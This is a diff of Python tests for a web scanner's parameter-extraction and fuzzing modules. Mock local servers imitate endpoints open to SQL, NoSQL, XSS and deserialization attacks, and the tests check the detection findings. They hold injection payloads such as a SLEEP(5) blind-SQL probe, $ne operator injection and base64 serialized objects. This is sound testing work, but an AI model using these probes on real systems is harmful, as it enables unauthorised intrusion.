+ + if e.data["description"] == "HTTP Extracted Parameter [q4] (GET Form Submodule)": + if e.data["original_value"] == "trees and forests": + found_form_input_with_spaces = True + if e.data["original_value"] == "trees": + avoid_truncated_values = False + assert found_jquery_get, "Did not extract Jquery GET parameters" assert found_jquery_post, "Did not extract Jquery POST parameters" assert found_form_get, "Did not extract Form GET parameters" assert found_form_post, "Did not extract Form POST parameters" + assert found_form_generic, "Did not extract Form (Generic) parameters" + assert found_form_input_with_spaces, "Did not extract Form input with spaces" + assert avoid_truncated_values, "Emitted a parameter with spaces without the entire value" assert found_jquery_get_original_value, "Did not extract Jquery GET parameter original_value" assert found_jquery_post_original_value, "Did not extract Jquery POST parameter original_value" assert found_form_get_original_value, "Did not extract Form GET parameter original_value" assert found_form_post_original_value, "Did not extract Form POST parameter original_value" + assert found_form_generic_original_value, "Did not extract Form (Generic) parameter original_value" assert found_htmltags_a, "Did not extract parameter(s) from a-tag" assert 
found_htmltags_img, "Did not extract parameter(s) from img-tag" + assert found_select_noquotes, "Did not extract parameter(s) from select-tag" + assert found_form_get_additional_params, "Did not extract additional parameters from GET form" + assert found_form_post_additional_params, "Did not extract additional parameters from POST form" + + +class TestExcavateParameterExtraction_postform_noaction(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postform_extract_html = """ + +

Post form without action

+
+ + +

+ +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.postform_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_formnoaction_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [state] (POST Form (no action) Submodule)" in e.data["description"]: + excavate_formnoaction_extraction = True + assert excavate_formnoaction_extraction, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_postform_htmlencodedaction(TestExcavateParameterExtraction_postform_noaction): + postform_extract_html = """ + + + +
+
+ +
+ +
+ + + """ + + def check(self, module_test, events): + excavate_handle_htmlencoded_action = True + for e in events: + if e.type == "WEB_PARAMETER": + if ( + "HTTP Extracted Parameter [value] (POST Form Submodule)" in e.data["description"] + and e.data["url"] == "https://127.0.0.1:8080/sso-web/singleSignOn.action" + ): + excavate_handle_htmlencoded_action = True + assert excavate_handle_htmlencoded_action, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_additionalparams(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postformnoaction_extract_multiparams_html = """ + +

Post form without action

+
+ + + + +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = { + "response_data": self.postformnoaction_extract_multiparams_html, + "headers": {"Content-Type": "text/html"}, + } + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_additionalparam_extraction_param1 = False + excavate_additionalparam_extraction_param2 = False + excavate_additionalparam_extraction_param3 = False + for e in events: + if e.type == "WEB_PARAMETER": + if ( + e.data["name"] == "template-action" + and "csrf" in e.data["additional_params"].keys() + and "template" in e.data["additional_params"].keys() + ): + excavate_additionalparam_extraction_param1 = True + if ( + e.data["name"] == "template" + and "csrf" in e.data["additional_params"].keys() + and "template-action" in e.data["additional_params"].keys() + ): + excavate_additionalparam_extraction_param2 = True + if ( + e.data["name"] == "csrf" + and "template" in e.data["additional_params"].keys() + and "template-action" in e.data["additional_params"].keys() + ): + excavate_additionalparam_extraction_param3 = True + assert excavate_additionalparam_extraction_param1, ( + "Excavate failed to extract web parameter with correct additional data (param 1)" + ) + assert excavate_additionalparam_extraction_param2, ( + "Excavate failed to extract web parameter with correct additional data (param 2)" + ) + assert excavate_additionalparam_extraction_param3, ( + "Excavate failed to extract web parameter with correct additional data (param 3)" + ) class TestExcavateParameterExtraction_getparam(ModuleTestBase): @@ -562,10 +738,91 @@ def check(self, module_test, events): assert excavate_getparam_extraction, "Excavate failed to extract web parameter" +class TestExcavateParameterExtraction_relativeurl(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + config_overrides = {"web": {"spider_distance": 2, "spider_depth": 3}} + + # Secondary page that has a relative link to a traversal URL + secondary_page_html = """ + + Go to root + + """ + + # Primary page that leads to the secondary page + primary_page_html = """ + + Go to secondary page + + """ + + # Root page content + root_page_html = "Root page" + + async def setup_after_prep(self, module_test): + module_test.httpserver.expect_request("/").respond_with_data(self.primary_page_html) + module_test.httpserver.expect_request("/secondary").respond_with_data(self.secondary_page_html) + module_test.httpserver.expect_request("/root.html").respond_with_data(self.root_page_html) + + def check(self, module_test, events): + # Validate that the traversal was successful and WEB_PARAMETER was extracted + traversed_to_root = False + parameter_extraction_found = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter" in e.data["description"]: + parameter_extraction_found = True + + if e.type == "URL": + if "root.html" in e.parsed_url.path: + traversed_to_root = True + + assert traversed_to_root, "Failed to follow the relative traversal to /root.html" + assert parameter_extraction_found, "Excavate failed to extract parameter after traversal" + + +class TestExcavateParameterExtraction_getparam_novalue(TestExcavateParameterExtraction_getparam): + getparam_extract_html = """ + + """ + + def check(self, module_test, events): + excavate_getparam_extraction = False + 
found_no_value_additional_params = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [searchTerm] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + if "searchTerm2" in e.data["additional_params"].keys(): + found_no_value_additional_params = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + assert found_no_value_additional_params, ( + "Excavate failed to extract additional parameters for input tag with no value" + ) + + class TestExcavateParameterExtraction_json(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] modules_overrides = ["httpx", "excavate", "paramminer_getparams"] - config_overrides = {"modules": {"paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}}} + config_overrides = { + "modules": { + "excavate": {"speculate_params": True}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + } + } getparam_extract_json = """ { "obscureParameter": 1, @@ -592,7 +849,12 @@ def check(self, module_test, events): class TestExcavateParameterExtraction_xml(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] modules_overrides = ["httpx", "excavate", "paramminer_getparams"] - config_overrides = {"modules": {"paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}}} + config_overrides = { + "modules": { + "excavate": {"speculate_params": True}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + } + } getparam_extract_xml = """ 1 @@ -616,6 +878,99 @@ def check(self, module_test, events): assert excavate_xml_extraction, "Excavate failed to extract xml parameter" +class TestExcavateParameterExtraction_xml_invalid(TestExcavateParameterExtraction_xml): + getparam_extract_xml = """ + + 1 + invalid\nwith\nnewlines + + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.getparam_extract_xml, "headers": {"Content-Type": "application/xml"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_xml_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if ( + "HTTP Extracted Parameter (speculative from xml content) [newlines]" in e.data["description"] + and "\n" not in e.data["original_value"] + ): + excavate_xml_extraction = True + assert excavate_xml_extraction, "Excavate failed to extract xml parameter" + + +class TestExcavateParameterExtraction_inputtagnovalue(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + getparam_extract_html = """ +
+ """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.getparam_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_getparam_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [novalue] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_jqueryjsonajax(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + modules_overrides = ["httpx", "excavate", "hunt"] + jsonajax_extract_html = """ + + + + +

test

+ + + """ + return Response(xss_block, status=200) + return Response(self.parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + expect_args = re.compile("/otherpage.php") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + original_value_captured = False + xss_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [language]" in e.data["description"]: + web_parameter_emitted = True + if e.data["original_value"] == "en": + original_value_captured = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [language] Context: [In Javascript]" in e.data["description"]: + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert original_value_captured, "original_value not captured" + assert xss_finding_emitted, "In Javascript XSS FINDING not emitted" + + +# XSS Parameter Needing URL-Encoding +class Test_Lightfuzz_urlencoding(Test_Lightfuzz_xss_injs): + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["cmdi", "crypto", "path", "serial", "sqli", "ssti", "xss"], + } + }, + } + + parameter_block = """ + + Link + + """ + + def check(self, module_test, events): + web_parameter_emitted = False + original_value_captured = False + xss_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [language]" in e.data["description"]: + web_parameter_emitted = True + if e.data["original_value"] is not None and e.data["original_value"] == "parameter with spaces": + original_value_captured = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [language] Context: [In Javascript]" in e.data["description"]: + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert original_value_captured, "original_value not captured" + assert xss_finding_emitted, "In Javascript XSS FINDING not emitted" + + +class Test_Lightfuzz_nosqli_quoteescape(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["nosqli"], + } + }, + } + + def request_handler(self, request): + normal_block = """ +
+ + Pets +
+ """ + + qs = str(request.query_string.decode()) + if "category=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + if value == "Pets%27": + return Response("JSON ERROR!", status=500) + elif value == "Pets%5C%27": + return Response("No results", status=200) + elif value == "Pets%27%20%26%26%200%20%26%26%20%27x": + return Response("No results", status=200) + elif value == "Pets%27%20%26%26%201%20%26%26%20%27x": + return Response('{"category":"Pets","entries":["dog","cat","bird"]}', status=200) + else: + return Response("No results", status=200) + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + nosqli_finding_emitted = False + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + if ( + "Possible NoSQL Injection. Parameter: [category] Parameter Type: [GETPARAM] Original Value: [Pets] Detection Method: [Quote/Escaped Quote + Conditional Affect]" + in e.data["description"] + ): + nosqli_finding_emitted = True + assert nosqli_finding_emitted, "NoSQLi FINDING not emitted" + assert finding_count == 1, "Unexpected FINDING events reported" + + +class Test_Lightfuzz_nosqli_negation(Test_Lightfuzz_nosqli_quoteescape): + def request_handler(self, request): + form_block = """ +
+ + +
+ + +
+ +
+ """ + if request.method == "GET": + return Response(form_block, status=200) + + if "username[$ne]" in request.form.keys() and "password[$ne]" in request.form.keys(): + return Response("Welcome, testuser1!", status=200) + if "username[$eq]" in request.form.keys() and "password[$eq]" in request.form.keys(): + return Response("Invalid Username or Password!", status=200) + else: + return Response("Invalid Username or Password!", status=200) + + def check(self, module_test, events): + nosqli_finding_emitted = False + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + if ( + "Possible NoSQL Injection. Parameter: [password] Parameter Type: [POSTPARAM] Detection Method: [Parameter Name Operator Injection - Negation ([$ne])] Differences: [body]" + in e.data["description"] + ): + nosqli_finding_emitted = True + assert nosqli_finding_emitted, "NoSQLi FINDING not emitted" + assert finding_count == 2, "Unexpected FINDING events reported" + + +class Test_Lightfuzz_nosqli_negation_falsepositive(Test_Lightfuzz_nosqli_quoteescape): + def request_handler(self, request): + form_block = """ +
+ + +
+ + +
+ +
+ """ + if request.method == "GET": + return Response(form_block, status=200) + + if "username[$ne]" in request.form.keys() and "password[$ne]" in request.form.keys(): + return Response("missing username or password", status=500) + if "username[$eq]" in request.form.keys() and "password[$eq]" in request.form.keys(): + return Response("missing username or password", status=500) + else: + return Response("Invalid Username or Password!", status=200) + + def check(self, module_test, events): + finding_count = 0 + for e in events: + if e.type == "FINDING": + finding_count += 1 + assert finding_count == 0, "False positive FINDING emitted" + + +# SQLI Single Quote/Two Single Quote (getparam) +class Test_Lightfuzz_sqli(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + qs = str(request.query_string.decode()) + parameter_block = """ + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote getparam FINDING not emitted" + + +# SQLI Single Quote/Two Single Quote (postparam) +class Test_Lightfuzz_sqli_post(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + } + }, + } + + def request_handler(self, request): + parameter_block = """ + + """ + + if "search" in request.form.keys(): + value = request.form["search"] + + sql_block_normal = f""" +
+

0 search results for '{unquote(value)}'

+
+
+ """ + + sql_block_error = """ +
+

Found error in SQL query

+
+
+ """ + if value.endswith("'"): + if value.endswith("''"): + return Response(sql_block_normal, status=200) + return Response(sql_block_error, status=500) + return Response(parameter_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqli_finding_emitted, "SQLi Single/Double Quote postparam FINDING not emitted" + + +# disable_post test +class Test_Lightfuzz_disable_post(Test_Lightfuzz_sqli_post): + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["sqli"], + "disable_post": True, + } + }, + } + + def check(self, module_test, events): + web_parameter_emitted = False + sqli_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [search] Parameter Type: [POSTPARAM] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert not sqli_finding_emitted, "post-based SQLI emitted despite post-parameters being disabled" + + +# SQLI Single Quote/Two Single Quote (headers) +class Test_Lightfuzz_sqli_headers(Test_Lightfuzz_sqli): + async def setup_after_prep(self, module_test): + module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + seed_events = [] + parent_event = module_test.scan.make_event( + "http://127.0.0.1:8888/", + "URL", + module_test.scan.root_event, + module="httpx", + tags=["status-200", "distance-0"], + ) + + data = { + "host": "127.0.0.1", + "type": "HEADER", + "name": "test", + "original_value": None, + "url": "http://127.0.0.1:8888", + "description": "Test Dummy Header", + } + seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"]) + seed_events.append(seed_event) + module_test.scan.target.seeds.events = set(seed_events) + + def request_handler(self, request): + placeholder_block = """ + +

placeholder

+ + """ + + if request.headers.get("Test") is not None: + header_value = request.headers.get("Test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + header_block_error = """ + +

placeholder

+

Error!

+
+            """
+            if header_value.endswith("'") and not header_value.endswith("''"):
+                return Response(header_block_error, status=500)
+            return Response(header_block_normal, status=200)
+        return Response(placeholder_block, status=200)
+
+    def check(self, module_test, events):
+        sqli_finding_emitted = False
+        for e in events:
+            if e.type == "FINDING":
+                if (
+                    "Possible SQL Injection. Parameter: [test] Parameter Type: [HEADER] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]"
+                    in e.data["description"]
+                ):
+                    sqli_finding_emitted = True
+        assert sqli_finding_emitted, "SQLi Single/Double Quote headers FINDING not emitted"
+
+
+# SQLI Single Quote/Two Single Quote (cookies)
+class Test_Lightfuzz_sqli_cookies(Test_Lightfuzz_sqli):
+    async def setup_after_prep(self, module_test):
+        module_test.scan.modules["lightfuzz"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA"
+        expect_args = re.compile("/")
+        module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler)
+
+        seed_events = []
+        parent_event = module_test.scan.make_event(
+            "http://127.0.0.1:8888/",
+            "URL",
+            module_test.scan.root_event,
+            module="httpx",
+            tags=["status-200", "distance-0"],
+        )
+
+        data = {
+            "host": "127.0.0.1",
+            "type": "COOKIE",
+            "name": "test",
+            "original_value": None,
+            "url": "http://127.0.0.1:8888",
+            "description": "Test Dummy Cookie",
+        }
+        seed_event = module_test.scan.make_event(data, "WEB_PARAMETER", parent_event, tags=["distance-0"])
+        seed_events.append(seed_event)
+        module_test.scan.target.seeds.events = set(seed_events)
+
+    def request_handler(self, request):
+        placeholder_block = """
+
+

placeholder

+ + """ + + if request.cookies.get("test") is not None: + header_value = request.cookies.get("test") + + header_block_normal = f""" + +

placeholder

+

test: {header_value}

+ + """ + + header_block_error = """ + +

placeholder

+

Error!

+ + """ + if header_value.endswith("'") and not header_value.endswith("''"): + return Response(header_block_error, status=500) + return Response(header_block_normal, status=200) + return Response(placeholder_block, status=200) + + def check(self, module_test, events): + sqli_finding_emitted = False + for e in events: + if e.type == "FINDING": + if ( + "Possible SQL Injection. Parameter: [test] Parameter Type: [COOKIE] Detection Method: [Single Quote/Two Single Quote, Code Change (200->500->200)]" + in e.data["description"] + ): + sqli_finding_emitted = True + assert sqli_finding_emitted, "SQLi Single/Double Quote cookies FINDING not emitted" + + +# SQLi Delay Probe +class Test_Lightfuzz_sqli_delay(Test_Lightfuzz_sqli): + def request_handler(self, request): + from time import sleep + + qs = str(request.query_string.decode()) + + parameter_block = """ + + + """ + if "search=" in qs: + value = qs.split("=")[1] + + if "&" in value: + value = value.split("&")[0] + + sql_block = """ +
+

0 search results found

+
+
+ """ + if "' AND (SLEEP(5)) AND '" in unquote(value): + sleep(5) + return Response(sql_block, status=200) + return Response(parameter_block, status=200) + + def check(self, module_test, events): + web_parameter_emitted = False + sqldelay_finding_emitted = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [search]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if ( + "Possible Blind SQL Injection. Parameter: [search] Parameter Type: [GETPARAM] Detection Method: [Delay Probe (1' AND (SLEEP(5)) AND ')]" + in e.data["description"] + ): + sqldelay_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER was not emitted" + assert sqldelay_finding_emitted, "SQLi Delay FINDING not emitted" + + +# Serialization Module (Error Resolution) +class Test_Lightfuzz_serial_errorresolution(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": { + "enabled_submodules": ["serial"], + } + }, + } + + dotnet_serial_error = """ + + Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. + +

+ + Exception Details: System.Runtime.Serialization.SerializationException: End of Stream encountered before parsing was completed.

+ + """ + + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def request_handler(self, request): + dotnet_serial_error_resolved = ( + "Deserialization successful! Object type: System.String" + ) + post_params = request.form + + if "TextBox1" not in post_params.keys(): + return Response(self.dotnet_serial_html, status=200) + + else: + if post_params["__VIEWSTATE"] != "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP": + return Response(self.dotnet_serial_error, status=500) + if post_params["TextBox1"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==": + return Response(dotnet_serial_error_resolved, status=200) + else: + return Response(self.dotnet_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_form_parameter = False + excavate_extracted_form_parameter_details = False + lightfuzz_serial_detect_errorresolution = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "TextBox1": + excavate_extracted_form_parameter = True + if ( + e.data["url"] == "http://127.0.0.1:8888/deser.aspx" + and e.data["host"] == "127.0.0.1" + and e.data["additional_params"] + == { + "__VIEWSTATE": "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP", + "__VIEWSTATEGENERATOR": "AD6F025C", + "__EVENTVALIDATION": "/wEdAANdCjkiIFhjCB8ta8aO/EhuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3czZjft8VgObR/WUivai7w4kfR1wg==", + "Button1": "Submit", + } + ): + excavate_extracted_form_parameter_details = True + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [TextBox1] Parameter Type: [POSTPARAM] Technique: [Error Resolution] Serialization Payload: [dotnet_base64]" + ): + lightfuzz_serial_detect_errorresolution = True + + assert excavate_extracted_form_parameter, "WEB_PARAMETER for POST form was not emitted" + assert excavate_extracted_form_parameter_details, "WEB_PARAMETER for POST form did not have correct data" + assert lightfuzz_serial_detect_errorresolution, ( + "Lightfuzz Serial module failed to detect ASP.NET error resolution based deserialization" + ) + + +# Serialization Module (Error Resolution False Positive) +class Test_Lightfuzz_serial_errorresolution_falsepositive(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + dotnet_serial_error_resolved_with_general_error = ( + "Internal Server Error (invalid characters!)" + ) + post_params = request.form + + if "TextBox1" not in post_params.keys(): + return Response(self.dotnet_serial_html, status=200) + + else: + if post_params["__VIEWSTATE"] != "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP": + return Response(self.dotnet_serial_error, status=500) + if post_params["TextBox1"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==": + return Response(dotnet_serial_error_resolved_with_general_error, status=200) + else: + return Response(self.dotnet_serial_error, status=500) + + def check(self, module_test, events): + no_finding_emitted = True + + for e in events: + if e.type == "FINDING": + no_finding_emitted = False + + assert no_finding_emitted, "False positive finding was emitted" + + +class Test_Lightfuzz_serial_errorresolution_existingvalue_valid(Test_Lightfuzz_serial_errorresolution): + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + def check(self, module_test, events): + excavate_extracted_form_parameter = False + excavate_extracted_form_parameter_details = False + excavate_detect_serialization_value = False + lightfuzz_serial_detect_errorresolution = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["name"] == "TextBox1": + excavate_extracted_form_parameter = True + if ( + e.data["url"] == "http://127.0.0.1:8888/deser.aspx" + and e.data["host"] == "127.0.0.1" + and e.data["original_value"] == "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==" + and e.data["additional_params"] + == { + "__VIEWSTATE": "/wEPDwULLTE5MTI4MzkxNjVkZNt7ICM+GixNryV6ucx+srzhXlwP", + "__VIEWSTATEGENERATOR": "AD6F025C", + "__EVENTVALIDATION": "/wEdAANdCjkiIFhjCB8ta8aO/EhuESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3czZjft8VgObR/WUivai7w4kfR1wg==", + "Button1": "Submit", + } + ): + excavate_extracted_form_parameter_details = True + if e.type == "FINDING": + if e.data["description"] == "HTTP response (body) contains a possible serialized object (DOTNET)": + excavate_detect_serialization_value = True + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [TextBox1] Parameter Type: [POSTPARAM] Original Value: [AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==] Technique: [Error Resolution] Serialization Payload: [dotnet_base64]" + ): + lightfuzz_serial_detect_errorresolution = True + + assert excavate_extracted_form_parameter, "WEB_PARAMETER for POST form was not emitted" + assert excavate_extracted_form_parameter_details, "WEB_PARAMETER for POST form did not have correct data" + assert excavate_detect_serialization_value, "WEB_PARAMETER for POST form did not have correct data" + assert lightfuzz_serial_detect_errorresolution, ( + "Lightfuzz Serial module failed to detect ASP.NET error resolution based deserialization" + ) + + +class Test_Lightfuzz_serial_errorresolution_existingvalue_invalid(Test_Lightfuzz_serial_errorresolution_falsepositive): + dotnet_serial_html = """ + + + + Deserialization RCE Example + + +
+
+ +
+ +
+ + + +
+
+

Deserialization Test

+ Enter serialized data:
+

+

+
+
+ + + + + """ + + +# Serialization Module (Error Differential) +class Test_Lightfuzz_serial_errordifferential(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + java_serial_error = """ + +

Internal Server Error

+

java.io.StreamCorruptedException: invalid stream header: 0C400304

+ + """ + + java_serial_error_keyword = """ + +

Internal Server Error

+

java.lang.ClassCastException: Cannot cast java.lang.String to lab.actions.common.serializable.AccessTokenUser

+ + """ + + java_serial_html = """ + + + + Deserialization RCE Example + + + Please log in to continue. + + + """ + + cookies = request.cookies + + if "session" not in cookies.keys(): + response = Response(java_serial_html, status=200) + response.set_cookie("session", value="", max_age=3600, httponly=True) + return response + + else: + if unquote(cookies["session"]) == "rO0ABXQABHRlc3Q=": + return Response(java_serial_error_keyword, status=500) + else: + return Response(java_serial_error, status=500) + + def check(self, module_test, events): + excavate_extracted_cookie_parameter = False + lightfuzz_serial_detect_errordifferential = False + + for e in events: + if e.type == "WEB_PARAMETER": + if e.data["description"] == "Set-Cookie Assigned Cookie [session]" and e.data["type"] == "COOKIE": + excavate_extracted_cookie_parameter = True + + if e.type == "FINDING": + if ( + e.data["description"] + == "POSSIBLE Unsafe Deserialization. Parameter: [session] Parameter Type: [COOKIE] Technique: [Differential Error Analysis] Error-String: [cannot cast java.lang.string] Payload: [java_base64_string_error]" + ): + lightfuzz_serial_detect_errordifferential = True + + assert excavate_extracted_cookie_parameter, "WEB_PARAMETER for cookie was not emitted" + assert lightfuzz_serial_detect_errordifferential, ( + "Lightfuzz Serial module failed to detect Java error differential based deserialization" + ) + + +# Serialization Modules (Error Differential - False positive check) +class Test_Lightfuzz_serial_errordifferential_falsepositive(Test_Lightfuzz_serial_errorresolution): + def request_handler(self, request): + post_params = request.form + if "TextBox1" not in post_params.keys(): + return Response(self.dotnet_serial_html, status=200) + + else: + dotnet_serial_reflection = ( + f"

invalid user

